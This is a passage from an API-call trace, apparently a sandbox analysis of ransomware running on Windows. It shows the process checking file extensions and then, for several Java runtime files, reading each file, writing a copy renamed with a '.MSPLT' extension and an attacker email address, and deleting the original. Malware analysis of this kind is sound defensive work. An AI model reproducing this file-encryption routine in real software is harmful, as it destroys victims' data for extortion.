(lpString=".zip") returned 4 [0313.996] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0313.996] lstrlenW (lpString=".rar") returned 4 [0313.996] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0313.996] lstrlenW (lpString=".bz2") returned 4 [0313.996] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0313.996] lstrlenW (lpString=".7z") returned 3 [0313.996] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0313.996] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.996] lstrlenW (lpString=".dbf") returned 4 [0313.996] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0313.996] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.996] lstrlenW (lpString=".1cd") returned 4 [0313.996] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0313.996] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.997] lstrlenW (lpString=".jpg") returned 4 [0313.997] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0313.997] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.997] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.997] lstrlenW (lpString=".doc") returned 4 [0313.997] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0313.997] lstrlenW (lpString=".docx") returned 5 [0313.997] lstrcmpiW (lpString1=".docx", lpString2="t.jar") returned -1 [0313.997] lstrlenW (lpString=".pdf") returned 4 [0313.997] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0313.997] lstrlenW (lpString=".xls") returned 4 [0313.997] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0313.997] lstrlenW (lpString=".xlsx") returned 5 [0313.997] lstrcmpiW (lpString1=".xlsx", lpString2="t.jar") returned -1 [0313.997] lstrlenW (lpString=".ppt") returned 4 [0313.997] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0313.997] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.997] lstrlenW (lpString=".zip") returned 4 [0313.998] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0313.998] lstrlenW (lpString=".rar") returned 4 [0313.998] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0313.998] lstrlenW (lpString=".bz2") returned 4 [0313.998] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0313.998] lstrlenW (lpString=".7z") returned 3 [0313.998] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0313.998] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.998] lstrlenW (lpString=".dbf") returned 4 [0313.998] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0313.998] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.998] lstrlenW (lpString=".1cd") returned 4 [0313.998] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0313.998] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.998] lstrlenW (lpString=".jpg") returned 4 [0313.998] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0313.998] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0313.998] lstrlenW (lpString="management.properties") returned 21 [0313.999] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0314.180] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=14630) returned 1 [0314.180] CloseHandle (hObject=0x460) returned 1 [0314.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties")) returned 0x20 [0314.542] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.542] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.542] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.543] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.543] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0314.544] GetLastError () returned 0x0 [0314.544] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x3926, lpOverlapped=0x0) returned 1 [0314.547] WriteFile (in: hFile=0x534, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x3930, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x3930, lpOverlapped=0x0) returned 1 [0314.549] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0314.549] WriteFile (in: hFile=0x534, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xfe, lpOverlapped=0x0) returned 1 [0314.549] SetEndOfFile (hFile=0x534) returned 1 [0314.550] CloseHandle (hObject=0x534) returned 1 [0314.550] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.550] SetEndOfFile (hFile=0x3b0) returned 1 [0314.554] CloseHandle (hObject=0x3b0) returned 1 [0314.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.555] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties")) returned 1 [0314.555] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.556] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.556] lstrlenW (lpString=".doc") returned 4 [0314.556] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0314.556] lstrlenW (lpString=".docx") returned 5 [0314.556] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0314.556] lstrlenW (lpString=".pdf") returned 4 [0314.556] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0314.556] lstrlenW (lpString=".xls") returned 4 [0314.556] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0314.556] lstrlenW (lpString=".xlsx") returned 5 [0314.556] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0314.556] lstrlenW (lpString=".ppt") returned 4 [0314.556] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0314.556] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.556] lstrlenW (lpString=".zip") returned 4 [0314.556] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0314.556] lstrlenW (lpString=".rar") returned 4 [0314.556] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0314.556] lstrlenW (lpString=".bz2") returned 4 [0314.556] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0314.556] lstrlenW (lpString=".7z") returned 3 [0314.556] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0314.557] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.557] lstrlenW (lpString=".dbf") returned 4 [0314.557] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0314.557] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.557] lstrlenW (lpString=".1cd") returned 4 [0314.557] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0314.557] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.557] lstrlenW (lpString=".jpg") returned 4 [0314.558] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0314.558] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.558] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.558] lstrlenW (lpString=".doc") returned 4 [0314.558] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0314.558] lstrlenW (lpString=".docx") returned 5 [0314.558] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0314.559] lstrlenW (lpString=".pdf") returned 4 [0314.559] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0314.559] lstrlenW (lpString=".xls") returned 4 [0314.559] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0314.559] lstrlenW (lpString=".xlsx") returned 5 [0314.559] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0314.559] lstrlenW (lpString=".ppt") returned 4 [0314.559] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0314.559] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.559] lstrlenW (lpString=".zip") returned 4 [0314.559] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0314.559] lstrlenW (lpString=".rar") returned 4 [0314.559] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0314.559] lstrlenW (lpString=".bz2") returned 4 [0314.559] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0314.559] lstrlenW (lpString=".7z") returned 3 [0314.559] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0314.559] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.559] lstrlenW (lpString=".dbf") returned 4 [0314.559] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0314.559] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.559] lstrlenW (lpString=".1cd") returned 4 [0314.560] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0314.560] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 71 [0314.560] lstrlenW (lpString=".jpg") returned 4 [0314.560] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0314.560] lstrcmpiW (lpString1=".certs", lpString2=".MSPLT") returned -1 [0314.560] lstrlenW (lpString="blacklisted.certs") returned 17 [0314.560] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.561] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=1253) returned 1 [0314.561] CloseHandle (hObject=0x3b0) returned 1 [0314.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs")) returned 0x20 [0314.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.562] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.562] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.562] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.562] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0314.567] GetLastError () returned 0x0 [0314.567] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x4e5, lpOverlapped=0x0) returned 1 [0314.570] WriteFile (in: hFile=0x534, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x4f0, lpOverlapped=0x0) returned 1 [0314.572] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0314.572] WriteFile (in: hFile=0x534, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xf6, lpOverlapped=0x0) returned 1 [0314.572] SetEndOfFile (hFile=0x534) returned 1 [0314.573] CloseHandle (hObject=0x534) returned 1 [0314.573] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.573] SetEndOfFile (hFile=0x3b0) returned 1 [0314.578] CloseHandle (hObject=0x3b0) returned 1 [0314.578] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.579] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs")) returned 1 [0314.580] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.580] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.580] lstrlenW (lpString=".doc") returned 4 [0314.580] lstrcmpiW (lpString1=".doc", lpString2="erts") returned -1 [0314.580] lstrlenW (lpString=".docx") returned 5 [0314.580] lstrcmpiW (lpString1=".docx", lpString2="certs") returned -1 [0314.580] lstrlenW (lpString=".pdf") returned 4 [0314.580] lstrcmpiW (lpString1=".pdf", lpString2="erts") returned -1 [0314.580] lstrlenW (lpString=".xls") returned 4 [0314.580] lstrcmpiW (lpString1=".xls", lpString2="erts") returned -1 [0314.580] lstrlenW (lpString=".xlsx") returned 5 [0314.580] lstrcmpiW (lpString1=".xlsx", lpString2="certs") returned -1 [0314.580] lstrlenW (lpString=".ppt") returned 4 [0314.580] lstrcmpiW (lpString1=".ppt", lpString2="erts") returned -1 [0314.580] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.580] lstrlenW (lpString=".zip") returned 4 [0314.580] lstrcmpiW (lpString1=".zip", lpString2="erts") returned -1 [0314.580] lstrlenW (lpString=".rar") returned 4 [0314.580] lstrcmpiW (lpString1=".rar", lpString2="erts") returned -1 [0314.580] lstrlenW (lpString=".bz2") returned 4 [0314.580] lstrcmpiW (lpString1=".bz2", lpString2="erts") returned -1 [0314.580] lstrlenW (lpString=".7z") returned 3 [0314.580] lstrcmpiW (lpString1=".7z", lpString2="rts") returned -1 [0314.581] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.581] lstrlenW (lpString=".dbf") returned 4 [0314.581] lstrcmpiW (lpString1=".dbf", lpString2="erts") returned -1 [0314.581] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.581] lstrlenW (lpString=".1cd") returned 4 [0314.581] lstrcmpiW (lpString1=".1cd", lpString2="erts") returned -1 [0314.581] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.581] lstrlenW (lpString=".jpg") returned 4 [0314.581] lstrcmpiW (lpString1=".jpg", lpString2="erts") returned -1 [0314.581] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.581] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.581] lstrlenW (lpString=".doc") returned 4 [0314.581] lstrcmpiW (lpString1=".doc", lpString2="erts") returned -1 [0314.581] lstrlenW (lpString=".docx") returned 5 [0314.581] lstrcmpiW (lpString1=".docx", lpString2="certs") returned -1 [0314.581] lstrlenW (lpString=".pdf") returned 4 [0314.581] lstrcmpiW (lpString1=".pdf", lpString2="erts") returned -1 [0314.581] lstrlenW (lpString=".xls") returned 4 [0314.581] lstrcmpiW (lpString1=".xls", lpString2="erts") returned -1 [0314.582] lstrlenW (lpString=".xlsx") returned 5 [0314.582] lstrcmpiW (lpString1=".xlsx", lpString2="certs") returned -1 [0314.582] lstrlenW (lpString=".ppt") returned 4 [0314.582] lstrcmpiW (lpString1=".ppt", lpString2="erts") returned -1 [0314.582] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.582] lstrlenW (lpString=".zip") returned 4 [0314.582] lstrcmpiW (lpString1=".zip", lpString2="erts") returned -1 [0314.582] lstrlenW (lpString=".rar") returned 4 [0314.582] lstrcmpiW (lpString1=".rar", lpString2="erts") returned -1 [0314.582] lstrlenW (lpString=".bz2") returned 4 [0314.582] lstrcmpiW (lpString1=".bz2", lpString2="erts") returned -1 [0314.582] lstrlenW (lpString=".7z") returned 3 [0314.582] lstrcmpiW (lpString1=".7z", lpString2="rts") returned -1 [0314.582] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.582] lstrlenW (lpString=".dbf") returned 4 [0314.582] lstrcmpiW (lpString1=".dbf", lpString2="erts") returned -1 [0314.582] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.582] lstrlenW (lpString=".1cd") returned 4 [0314.582] lstrcmpiW (lpString1=".1cd", lpString2="erts") returned -1 [0314.582] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 65 [0314.583] lstrlenW (lpString=".jpg") returned 4 [0314.583] lstrcmpiW (lpString1=".jpg", lpString2="erts") returned -1 [0314.583] lstrcmpiW (lpString1=".0_144\\lib\\security\\cacerts", lpString2=".MSPLT") returned -1 [0314.583] lstrlenW (lpString="cacerts") returned 7 [0314.583] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.584] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=114923) returned 1 [0314.584] CloseHandle (hObject=0x3b0) returned 1 [0314.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts")) returned 0x20 [0314.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.585] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.585] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.585] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0314.585] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0314.586] GetLastError () returned 0x0 [0314.586] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x1c0eb, lpOverlapped=0x0) returned 1 [0315.037] WriteFile (in: hFile=0x534, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x1c0f0, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x1c0f0, lpOverlapped=0x0) returned 1 [0315.042] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0315.042] WriteFile (in: hFile=0x534, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xe2, lpOverlapped=0x0) returned 1 [0315.042] SetEndOfFile (hFile=0x534) returned 1 [0315.042] CloseHandle (hObject=0x534) returned 1 [0315.043] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.043] SetEndOfFile (hFile=0x3b0) returned 1 [0315.050] CloseHandle (hObject=0x3b0) returned 1 [0315.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0315.051] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts")) returned 1 [0315.053] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.053] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.053] lstrlenW (lpString=".doc") returned 4 [0315.053] lstrcmpiW (lpString1=".doc", lpString2="erts") returned -1 [0315.053] lstrlenW (lpString=".docx") returned 5 [0315.053] lstrcmpiW (lpString1=".docx", lpString2="certs") returned -1 [0315.053] lstrlenW (lpString=".pdf") returned 4 [0315.053] lstrcmpiW (lpString1=".pdf", lpString2="erts") returned -1 [0315.053] lstrlenW (lpString=".xls") returned 4 [0315.053] lstrcmpiW (lpString1=".xls", lpString2="erts") returned -1 [0315.053] lstrlenW (lpString=".xlsx") returned 5 [0315.053] lstrcmpiW (lpString1=".xlsx", lpString2="certs") returned -1 [0315.053] lstrlenW (lpString=".ppt") returned 4 [0315.053] lstrcmpiW (lpString1=".ppt", lpString2="erts") returned -1 [0315.053] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.053] lstrlenW (lpString=".zip") returned 4 [0315.053] lstrcmpiW (lpString1=".zip", lpString2="erts") returned -1 [0315.053] lstrlenW (lpString=".rar") returned 4 [0315.053] lstrcmpiW (lpString1=".rar", lpString2="erts") returned -1 [0315.054] lstrlenW (lpString=".bz2") returned 4 [0315.054] lstrcmpiW (lpString1=".bz2", lpString2="erts") returned -1 [0315.054] lstrlenW (lpString=".7z") returned 3 [0315.054] lstrcmpiW (lpString1=".7z", lpString2="rts") returned -1 [0315.054] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.054] lstrlenW (lpString=".dbf") returned 4 [0315.054] lstrcmpiW (lpString1=".dbf", lpString2="erts") returned -1 [0315.054] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.054] lstrlenW (lpString=".1cd") returned 4 [0315.054] lstrcmpiW (lpString1=".1cd", lpString2="erts") returned -1 [0315.054] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.054] lstrlenW (lpString=".jpg") returned 4 [0315.054] lstrcmpiW (lpString1=".jpg", lpString2="erts") returned -1 [0315.054] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.054] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.054] lstrlenW (lpString=".doc") returned 4 [0315.054] lstrcmpiW (lpString1=".doc", lpString2="erts") returned -1 [0315.054] lstrlenW (lpString=".docx") returned 5 [0315.054] lstrcmpiW (lpString1=".docx", 